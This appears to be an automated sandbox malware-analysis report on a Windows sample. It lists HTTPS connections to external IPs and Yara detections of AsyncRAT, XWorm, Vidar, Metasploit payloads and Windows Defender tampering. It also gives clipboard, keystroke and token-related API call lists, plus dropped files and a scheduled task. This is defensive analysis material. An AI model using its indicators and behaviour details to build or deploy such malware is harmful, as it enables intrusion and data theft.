Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59852
Source: unknown	Network traffic detected: HTTP traffic on port 59854 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 59831 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 59738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 59837 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 59862 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 59812 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59738
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59859
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59858
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59854
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59857
Source: unknown	Network traffic detected: HTTP traffic on port 59780 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59856
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59862
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59861
Source: unknown	Network traffic detected: HTTP traffic on port 59851 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 59794 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59864
Source: unknown	Network traffic detected: HTTP traffic on port 59823 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 59848 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 59777 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 59752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 59865 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 59779 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 59710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 59842 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 59836 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59866
Source: unknown	Network traffic detected: HTTP traffic on port 59859 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59865
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59867
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59752
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59751
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59750
Source: unknown	Network traffic detected: HTTP traffic on port 59822 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 59753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 59791 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 59730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 59856 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 59709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 59782 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 59853 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59764
Source: unknown	Network traffic detected: HTTP traffic on port 59825 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 59750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 59796 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 59771 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49920
Source: unknown	Network traffic detected: HTTP traffic on port 59731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59808
Source: unknown	Network traffic detected: HTTP traffic on port 59811 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 59821 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 59764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59801
Source: unknown	Network traffic detected: HTTP traffic on port 59793 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 59722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 59824 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59771
Source: unknown	Network traffic detected: HTTP traffic on port 59751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 59847 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 59866 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49843 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 59833 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59814
Source: unknown	Network traffic detected: HTTP traffic on port 59858 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59817
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59811
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59777
Source: unknown	Network traffic detected: HTTP traffic on port 59784 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59779
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59812
Source: unknown	Network traffic detected: HTTP traffic on port 59827 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59784
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59781
Source: unknown	Network traffic detected: HTTP traffic on port 59830 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59780
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59783
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59782
Source: unknown	Network traffic detected: HTTP traffic on port 49920 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749

Source: unknown	HTTPS traffic detected: 104.21.76.27:443 -> 192.168.2.4:49744 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.76.27:443 -> 192.168.2.4:49749 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.76.27:443 -> 192.168.2.4:49762 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.76.27:443 -> 192.168.2.4:49843 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.76.27:443 -> 192.168.2.4:49852 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.76.27:443 -> 192.168.2.4:49920 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.29.142:443 -> 192.168.2.4:59823 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:59827 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.76.27:443 -> 192.168.2.4:59836 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.82.94:443 -> 192.168.2.4:59835 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.29.142:443 -> 192.168.2.4:59842 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.82.94:443 -> 192.168.2.4:59848 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.76.27:443 -> 192.168.2.4:59861 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.29.142:443 -> 192.168.2.4:59709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.82.94:443 -> 192.168.2.4:59712 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:59710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.82.94:443 -> 192.168.2.4:59722 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.29.142:443 -> 192.168.2.4:59730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.82.94:443 -> 192.168.2.4:59731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.4:59729 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.82.94:443 -> 192.168.2.4:59738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 5.75.209.106:443 -> 192.168.2.4:59741 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.82.94:443 -> 192.168.2.4:59750 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.29.142:443 -> 192.168.2.4:59751 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.82.94:443 -> 192.168.2.4:59753 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.82.94:443 -> 192.168.2.4:59777 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.29.142:443 -> 192.168.2.4:59782 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.82.94:443 -> 192.168.2.4:59781 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.82.94:443 -> 192.168.2.4:59784 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.29.142:443 -> 192.168.2.4:59796 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.82.94:443 -> 192.168.2.4:59801 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.82.94:443 -> 192.168.2.4:59817 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 5.75.209.106:443 -> 192.168.2.4:59821 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:59824 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.29.142:443 -> 192.168.2.4:59825 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.82.94:443 -> 192.168.2.4:59827 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.82.94:443 -> 192.168.2.4:59836 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 176.113.115.96:443 -> 192.168.2.4:59842 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.4:59852 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 5.75.209.106:443 -> 192.168.2.4:59853 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Yara detected AsyncRAT

Source: Yara match	File source: 42.2.regsvr32.exe.ababde.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 42.2.regsvr32.exe.2530000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 42.2.regsvr32.exe.256131e.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 42.2.regsvr32.exe.ababde.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 42.2.regsvr32.exe.2530000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 42.2.regsvr32.exe.256131e.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000002A.00000002.4193180482.0000000002560000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002A.00000002.4185157711.0000000000A9B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002A.00000002.4191598560.0000000002530000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\AppData\Local\Temp\1053876001\d1d4560504.exe

Code function: 8_2_004050F9 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

8_2_004050F9

Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com

Code function: 20_2_0048F7C7 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

20_2_0048F7C7

Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com

Code function: 20_2_0048F55C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

20_2_0048F55C

Source: C:\Users\user\AppData\Local\Temp\1053876001\d1d4560504.exe

Code function: 8_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

8_2_004044D1

Source: C:\Windows\System32\regsvr32.exe

Window created: window name: CLIPBRDWNDCLASS

Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com

Code function: 20_2_004A9FD2 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

20_2_004A9FD2

Operating System Destruction

Protects its processes via BreakOnTermination flag

Source: C:\Windows\System32\regsvr32.exe

Process information set: 01 00 00 00

System Summary

Malicious sample detected (through community Yara rule)

Source: 42.2.regsvr32.exe.1b910000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
Source: 20.2.Appeal.com.4fa0000.1.unpack, type: UNPACKEDPE	Matched rule: Finds Vidar samples based on the specific strings Author: Sekoia.io
Source: 42.2.regsvr32.exe.1b910000.3.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
Source: 42.2.regsvr32.exe.ababde.0.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 42.2.regsvr32.exe.ababde.0.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 42.2.regsvr32.exe.2530000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 42.2.regsvr32.exe.2530000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 42.2.regsvr32.exe.256131e.2.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 42.2.regsvr32.exe.256131e.2.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 42.2.regsvr32.exe.ababde.0.raw.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 42.2.regsvr32.exe.ababde.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 42.2.regsvr32.exe.2530000.1.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 42.2.regsvr32.exe.2530000.1.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 42.2.regsvr32.exe.256131e.2.raw.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 42.2.regsvr32.exe.256131e.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0000002A.00000002.4193180482.0000000002560000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0000002A.00000002.4185157711.0000000000A9B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000007.00000002.2718587583.000000000A010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
Source: 0000002A.00000002.4309071983.000000001B910000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
Source: 0000002A.00000002.4191598560.0000000002530000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 0000002A.00000002.4191598560.0000000002530000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen

PE file contains section with special chars

Source: 2E02vIiMfd.exe	Static PE information: section name:
Source: 2E02vIiMfd.exe	Static PE information: section name: .idata
Source: 2E02vIiMfd.exe	Static PE information: section name:
Source: skotes.exe.0.dr	Static PE information: section name:
Source: skotes.exe.0.dr	Static PE information: section name: .idata
Source: skotes.exe.0.dr	Static PE information: section name:
Source: random[4].exe.6.dr	Static PE information: section name:
Source: random[4].exe.6.dr	Static PE information: section name: .idata
Source: random[4].exe.6.dr	Static PE information: section name:
Source: random[2].exe.6.dr	Static PE information: section name:
Source: random[2].exe.6.dr	Static PE information: section name: .idata
Source: random[2].exe.6.dr	Static PE information: section name:
Source: 8a7032211b.exe.6.dr	Static PE information: section name:
Source: 8a7032211b.exe.6.dr	Static PE information: section name: .idata
Source: 8a7032211b.exe.6.dr	Static PE information: section name:
Source: cf666bd85d.exe.6.dr	Static PE information: section name:
Source: cf666bd85d.exe.6.dr	Static PE information: section name: .idata
Source: cf666bd85d.exe.6.dr	Static PE information: section name:
Source: random[2].exe1.6.dr	Static PE information: section name:
Source: random[2].exe1.6.dr	Static PE information: section name: .idata
Source: random[2].exe1.6.dr	Static PE information: section name:
Source: 714ab8b5fd.exe.6.dr	Static PE information: section name:
Source: 714ab8b5fd.exe.6.dr	Static PE information: section name: .idata
Source: 714ab8b5fd.exe.6.dr	Static PE information: section name:

Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com

Code function: 20_2_00484763: GetFullPathNameW,_wcslen,CreateDirectoryW,CreateFileW,RemoveDirectoryW,DeviceIoControl,CloseHandle,CloseHandle,

20_2_00484763

Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com

Code function: 20_2_00471B4D LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

20_2_00471B4D

Source: C:\Users\user\AppData\Local\Temp\1053876001\d1d4560504.exe	Code function: 8_2_004038AF EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,InitOnceBeginInitialize,ExitWindowsEx,		8_2_004038AF
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	Code function: 20_2_0047F20D ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,		20_2_0047F20D

Source: C:\Users\user\Desktop\2E02vIiMfd.exe	File created: C:\Windows\Tasks\skotes.job	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1053876001\d1d4560504.exe	File created: C:\Windows\HolyChrysler	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_0061E530	6_2_0061E530
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_00658860	6_2_00658860
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_00657049	6_2_00657049
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_006578BB	6_2_006578BB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_00652D10	6_2_00652D10
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_00614DE0	6_2_00614DE0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_006531A8	6_2_006531A8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_00614B30	6_2_00614B30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_00647F36	6_2_00647F36
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_0065779B	6_2_0065779B
Source: C:\Users\user\AppData\Local\Temp\1053876001\d1d4560504.exe	Code function: 8_2_0040737E	8_2_0040737E
Source: C:\Users\user\AppData\Local\Temp\1053876001\d1d4560504.exe	Code function: 8_2_00406EFE	8_2_00406EFE
Source: C:\Users\user\AppData\Local\Temp\1053876001\d1d4560504.exe	Code function: 8_2_004079A2	8_2_004079A2
Source: C:\Users\user\AppData\Local\Temp\1053876001\d1d4560504.exe	Code function: 8_2_004049A8	8_2_004049A8
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	Code function: 20_2_00438017	20_2_00438017
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	Code function: 20_2_0042E144	20_2_0042E144
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	Code function: 20_2_0041E1F0	20_2_0041E1F0
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	Code function: 20_2_0044A26E	20_2_0044A26E
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	Code function: 20_2_004322A2	20_2_004322A2
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	Code function: 20_2_004122AD	20_2_004122AD
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	Code function: 20_2_0042C624	20_2_0042C624
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	Code function: 20_2_0044E87F	20_2_0044E87F
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	Code function: 20_2_0049C8A4	20_2_0049C8A4
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	Code function: 20_2_00482A05	20_2_00482A05
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	Code function: 20_2_00446ADE	20_2_00446ADE
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	Code function: 20_2_00478BFF	20_2_00478BFF
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	Code function: 20_2_0042CD7A	20_2_0042CD7A
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	Code function: 20_2_0043CE10	20_2_0043CE10
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	Code function: 20_2_00447159	20_2_00447159
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	Code function: 20_2_00419240	20_2_00419240
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	Code function: 20_2_004A5311	20_2_004A5311
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	Code function: 20_2_004196E0	20_2_004196E0
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	Code function: 20_2_00431704	20_2_00431704
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	Code function: 20_2_00431A76	20_2_00431A76
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	Code function: 20_2_00419B60	20_2_00419B60
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	Code function: 20_2_00437B8B	20_2_00437B8B
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	Code function: 20_2_00431D20	20_2_00431D20
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	Code function: 20_2_00437DBA	20_2_00437DBA
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	Code function: 20_2_00431FE7	20_2_00431FE7
Source: C:\Users\user\AppData\Local\Temp\1053877001\2328527160.exe	Code function: 22_2_01571F0F	22_2_01571F0F

Source: C:\Users\user\AppData\Local\Temp\1053876001\d1d4560504.exe	Code function: String function: 004062CF appears 58 times
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	Code function: String function: 00430DA0 appears 46 times
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	Code function: String function: 0042FD52 appears 40 times

Source: C:\Windows\System32\svchost.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 1888 -ip 1888

Source: random[3].exe1.6.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: ac911b4662.exe.6.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS

Source: 8d05ec9382.exe.6.dr	Static PE information: Number of sections : 11 > 10
Source: random[3].exe0.6.dr	Static PE information: Number of sections : 11 > 10

Source: 2E02vIiMfd.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 42.2.regsvr32.exe.1b910000.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
Source: 20.2.Appeal.com.4fa0000.1.unpack, type: UNPACKEDPE	Matched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
Source: 42.2.regsvr32.exe.1b910000.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
Source: 42.2.regsvr32.exe.ababde.0.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 42.2.regsvr32.exe.ababde.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 42.2.regsvr32.exe.2530000.1.raw.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 42.2.regsvr32.exe.2530000.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 42.2.regsvr32.exe.256131e.2.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 42.2.regsvr32.exe.256131e.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 42.2.regsvr32.exe.ababde.0.raw.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 42.2.regsvr32.exe.ababde.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 42.2.regsvr32.exe.2530000.1.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 42.2.regsvr32.exe.2530000.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
